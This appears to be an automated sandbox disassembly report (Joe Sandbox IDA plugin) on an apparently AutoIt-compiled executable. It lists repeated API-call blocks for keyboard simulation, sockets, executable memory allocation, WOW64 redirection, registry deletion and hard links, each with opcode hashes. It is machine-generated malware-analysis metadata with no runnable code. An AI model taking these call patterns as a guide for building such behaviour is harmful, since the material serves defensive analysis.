                                                        • Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC
                                                      • SendMessageW.USER32(00CBDAD0,000000B0,000001BC,000001C0), ref: 0066AD4B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 3601265619-2594219639
                                                      • Opcode ID: 9c4aeff02ff381d256d1fca8c45cc62d29a9e424596bdedd57035dcb54b4d730
                                                      • Instruction ID: d05bf70765bd066c974f57ce38ca5bbc2cd8b33f6089e163224ff60e4ec441c3
                                                      • Opcode Fuzzy Hash: 9c4aeff02ff381d256d1fca8c45cc62d29a9e424596bdedd57035dcb54b4d730
                                                      • Instruction Fuzzy Hash: 3A0144312015109FC714EF29D898AA577E7FF8A325F180269F426973B1CB31AC468F61
                                                      APIs
                                                        • Part of subcall function 005F603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F6051
                                                      • SendMessageW.USER32(?,0000000C,00000000,?), ref: 005F607F
                                                      • GetParent.USER32(?), ref: 00630D46
                                                      • InvalidateRect.USER32(00000000,?,005F3A4F,?,00000000,00000001), ref: 00630D4D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$InvalidateParentRectTimeout
                                                      • String ID: @U=u
                                                      • API String ID: 3648793173-2594219639
                                                      • Opcode ID: 2af66df2cfe83f1cea64651c31ab1ec621198a1cb740541071bfadd78ebacda1
                                                      • Instruction ID: 26eb6a81e534f0406cadea93f9003d9d11aa1874f971fa2e0330893ebab4c4f8
                                                      • Opcode Fuzzy Hash: 2af66df2cfe83f1cea64651c31ab1ec621198a1cb740541071bfadd78ebacda1
                                                      • Instruction Fuzzy Hash: 77F01C31144208BBEF211F60EC0DBA57F9BAB15754F245439F6409A1B1CAA66851AB60
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,005E4BD0,?,005E4DEF,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4C11
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E4C23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: a30a2bf9ae0c4853cd9a5ab2108090eb306e04eac051ba83a336ef98c3f5adc2
                                                      • Instruction ID: b71eb036100a2528b4de6e61c3e95c469bf16fca148e6d0c094a4b525faf9bde
                                                      • Opcode Fuzzy Hash: a30a2bf9ae0c4853cd9a5ab2108090eb306e04eac051ba83a336ef98c3f5adc2
                                                      • Instruction Fuzzy Hash: 1AD01230511B13CFD7209F71E908606BAD6FF09391B129C39E4C6D7550E6B0D880CB50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,005E4B83,?), ref: 005E4C44
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E4C56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: aebd7ae5d4948f11b5946f4d06cfa75c13819d6ac1f9000b1ab46d09b308f791
                                                      • Instruction ID: 114e45e4fddf535fd10c1a98b710489f0e37d1f4349a5acc9a87b06e4428e511
                                                      • Opcode Fuzzy Hash: aebd7ae5d4948f11b5946f4d06cfa75c13819d6ac1f9000b1ab46d09b308f791
                                                      • Instruction Fuzzy Hash: C5D01230510753CFD7249F32E908616B6D6BF05391B229839D4D6D7560E6B4D880CA50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00661039), ref: 00660DF5
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00660E07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: bf6c6b8699c2bdbfd8e19d19e44882c02eae46f9074b0377a228224119588227
                                                      • Instruction ID: aa7e89642d6cc613c88689495377472c22c93d01a69eedd8e3b91dfe0f8e5803
                                                      • Opcode Fuzzy Hash: bf6c6b8699c2bdbfd8e19d19e44882c02eae46f9074b0377a228224119588227
                                                      • Instruction Fuzzy Hash: 80D01270510722CFE7205F75D808687B6EBAF05391F129C7DD485D2650D6B1D4A0C660
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00658CF4,?,0066F910), ref: 006590EE
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00659100
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: 006bc791a015700b6958bc853ae0dc4a036acd92238307a0d6dc8985e68ac608
                                                      • Instruction ID: 32ed388099bbbe3cf48471dfbfc4d704a3b159a29260c1ad67781605336545b0
                                                      • Opcode Fuzzy Hash: 006bc791a015700b6958bc853ae0dc4a036acd92238307a0d6dc8985e68ac608
                                                      • Instruction Fuzzy Hash: A1D01234510723CFDB209F31E818546B6D6AF06392F12983AD886D6650EBB0C484C660
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: b4a9c6e71f5e86dcb35d0e8f1571be485d2c581854b6c20545587e2946591f81
                                                      • Instruction ID: 8853311a732d7e6695db8d3aa4af21f0d96acd6dbfadcdb7b29071c4241279bc
                                                      • Opcode Fuzzy Hash: b4a9c6e71f5e86dcb35d0e8f1571be485d2c581854b6c20545587e2946591f81
                                                      • Instruction Fuzzy Hash: 5FD0127185C528EACB149B90A8888BA777EF76A301F100463F4029A040E2218756EE25
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2288092cf3532fc00a03c446cded5f8ed2eeb344e9be968d3b01ea3148ae462a
                                                      • Instruction ID: 681433836b961f230d3b4d5af8095ef15d2206fc48636c0f220a4fd1d379dd34
                                                      • Opcode Fuzzy Hash: 2288092cf3532fc00a03c446cded5f8ed2eeb344e9be968d3b01ea3148ae462a
                                                      • Instruction Fuzzy Hash: A2C11CB5A04216EFDB24CF94C884AAEBBF6FF48714F158598E805EB251D730ED41DB90
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0065E0BE
                                                      • CharLowerBuffW.USER32(?,?), ref: 0065E101
                                                        • Part of subcall function 0065D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0065D7C5
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0065E301
                                                      • _memmove.LIBCMT ref: 0065E314
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: 8e7a7bb1fbc3267d4f8c386158dd504f97d5597db4678f39f117b4a1de642865
                                                      • Instruction ID: d7839a8144d624e6413416e803daf57018d75f5b238a338948e9b0be3f5b43a6
                                                      • Opcode Fuzzy Hash: 8e7a7bb1fbc3267d4f8c386158dd504f97d5597db4678f39f117b4a1de642865
                                                      • Instruction Fuzzy Hash: FEC15B716083419FCB18DF28C480A6ABBE5FF89714F14896DF899DB351D731EA4ACB81
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 006580C3
                                                      • CoUninitialize.OLE32 ref: 006580CE
                                                        • Part of subcall function 0063D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0063D5D4
                                                      • VariantInit.OLEAUT32(?), ref: 006580D9
                                                      • VariantClear.OLEAUT32(?), ref: 006583AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: eaa1fadc5a5fe76d258af5e8aefb46e7d99b6190f41cc8d90a33f2674122a9f4
                                                      • Instruction ID: 5dbde83a44248fda367d855c5b73be9a2415b0b1e574e5dca28653e3c2dbcca8
                                                      • Opcode Fuzzy Hash: eaa1fadc5a5fe76d258af5e8aefb46e7d99b6190f41cc8d90a33f2674122a9f4
                                                      • Instruction Fuzzy Hash: D2A18C752047429FCB14DF55C885B2ABBE6BF89314F04445CF996AB7A2CB30ED05CB82
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: 5fdcbf53d39b9008d4a1b84a90b97ee6bf3f38a7fc2368bf84ecbb1fb30aeeec
                                                      • Instruction ID: 1741c4e53a2851656ab0a266de4f1bc563eda765a238a07eb60c08dbc069487c
                                                      • Opcode Fuzzy Hash: 5fdcbf53d39b9008d4a1b84a90b97ee6bf3f38a7fc2368bf84ecbb1fb30aeeec
                                                      • Instruction Fuzzy Hash: CF51F074704302BADB24AF65D895B6AF7EBAF44310F20D81FF586EB291DB70D8818794
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 006569D1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 006569E1
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00656A45
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00656A51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      • Opcode ID: 87c57ededcd20813c2972eaa205d834bf3e9a932e572a76efc1c15178195b837
                                                      • Instruction ID: 2c1f386566b53c94a6f2c90c2180ff8ded3ca5fd11babe14642b7c68f98aa14b
                                                      • Opcode Fuzzy Hash: 87c57ededcd20813c2972eaa205d834bf3e9a932e572a76efc1c15178195b837
                                                      • Instruction Fuzzy Hash: 4C41C4747002016FEB64AF25DC8AF797BA5AF44B10F44802CFA999F3D2DAB09D008791
                                                      APIs
                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0066F910), ref: 006564A7
                                                      • _strlen.LIBCMT ref: 006564D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      • Opcode ID: c6b26b867127dcf973d2b6e2fd3e2fc5fa47e2217731b8ef73c716d1615f8fb6
                                                      • Instruction ID: aa83e037b622341555d3d6a76eec781144a1cdd725cb5bdcf849ce18ab128a24
                                                      • Opcode Fuzzy Hash: c6b26b867127dcf973d2b6e2fd3e2fc5fa47e2217731b8ef73c716d1615f8fb6
                                                      • Instruction Fuzzy Hash: EC41E631600105AFCB18EBA5EC89FEEB7BABF54310F508169FD1597292EB30AD04C754
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0064B89E
                                                      • GetLastError.KERNEL32(?,00000000), ref: 0064B8C4
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0064B8E9
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0064B915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 88d124578d2b7da922ab2a999d6952b0d31c6e5d3a9d468f3481508da9f34158
                                                      • Instruction ID: b631d9b7cc136888d5b61c6f5044861f11bd61092c14adf26e46b5963b4e57e4
                                                      • Opcode Fuzzy Hash: 88d124578d2b7da922ab2a999d6952b0d31c6e5d3a9d468f3481508da9f34158
                                                      • Instruction Fuzzy Hash: 83412C35600551DFCB14EF15C489A59BBE6FF8A310F098098ED8A9B762CB30FD01CB91
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0066AB60
                                                      • GetWindowRect.USER32(?,?), ref: 0066ABD6
                                                      • PtInRect.USER32(?,?,0066C014), ref: 0066ABE6
                                                      • MessageBeep.USER32(00000000), ref: 0066AC57
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: a13eaf50231c3b5ef61b240df4242177b3e7ebf49689b9beba986d1b3c00da59
                                                      • Instruction ID: f78a05d7e8f4721ae8df5050a34b25b282f358d26d5ac1bc622f16c345a46274
                                                      • Opcode Fuzzy Hash: a13eaf50231c3b5ef61b240df4242177b3e7ebf49689b9beba986d1b3c00da59
                                                      • Instruction Fuzzy Hash: 0D414A30600219DFCB11DF98D894AA9BBF7FF49710F1891A9E815AB361D730A941CF92
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00640B27
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00640B43
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00640BA9
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00640BFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 458c1a7c18a3e47c85fefa20ca58afbf53070b2e4bf9796c4de56c47d9543ba2
                                                      • Instruction ID: 7232262fd431368b3778f15c12743b59cdcfdf293c581f019de6132826765503
                                                      • Opcode Fuzzy Hash: 458c1a7c18a3e47c85fefa20ca58afbf53070b2e4bf9796c4de56c47d9543ba2
                                                      • Instruction Fuzzy Hash: BD315A70D44228AEFF308B25CC05BFABBA7EB95318F04425EE681522D1C3BA8D819759
                                                      APIs
                                                      • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00640C66
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00640C82
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00640CE1
                                                      • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00640D33
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: d8da46b7b9c2bf7f4641a8fc244597ab88adc8e98726df735373a0946fc30c00
                                                      • Instruction ID: 070d76ff2af95c8b1133ca13c71dfea8d035e4bfba112359a2c3af3a3f7e06bb
                                                      • Opcode Fuzzy Hash: d8da46b7b9c2bf7f4641a8fc244597ab88adc8e98726df735373a0946fc30c00
                                                      • Instruction Fuzzy Hash: 74315830D40228AEFF308B65DC057FEBB67AF49310F04431EE681522D1C3799D458791
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006161FB
                                                      • __isleadbyte_l.LIBCMT ref: 00616229
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00616257
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0061628D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
